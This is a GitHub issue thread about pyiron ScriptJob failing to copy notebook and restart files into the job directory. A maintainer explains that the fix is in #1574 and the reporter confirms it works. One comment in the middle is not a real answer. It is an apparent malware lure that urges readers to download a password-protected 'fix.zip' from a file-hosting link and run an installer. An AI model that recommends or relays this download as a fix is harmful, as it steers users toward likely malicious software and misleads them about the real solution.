### ISSUE TITLE
script job is not working

### ISSUE THREAD

**Issue by jyang2009** [pyiron/pyiron_base#1625]
Dear all,

Since today the pyiron script job is not working for me. Below is a test example:

```python
from pyiron import  Project
import os

pr = Project('test_queue')
job = pr.create_job(pr.job_type.ScriptJob, f"test_queue_job")
job.script_path = 'test_queue.ipynb'
job.server.queue = "cmti"
job.server.cores = 40
job.restart_file_list = [os.path.join(os.getcwd(),'test_file.py')]
print(job.name)
job.run(delete_existing_job = False)
```

I find that neither the `test_queue.ipynb` file nor the files specified in `job.restart_file_list` is copied to the job directory. (And thus it gives an error the notebook `test_queue.ipynb` does not exist when running in the queue.)

Best,
Jing

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pmrv** [comment]
Could be the issue fixed in #1574, the cluster version may be still out dated and doesn't contain that fix yet.

**Comment by jyang2009** [comment]
Dear Marvin,

I tested this new version and it indeed is working. Thanks a lot!

Best,
Jing
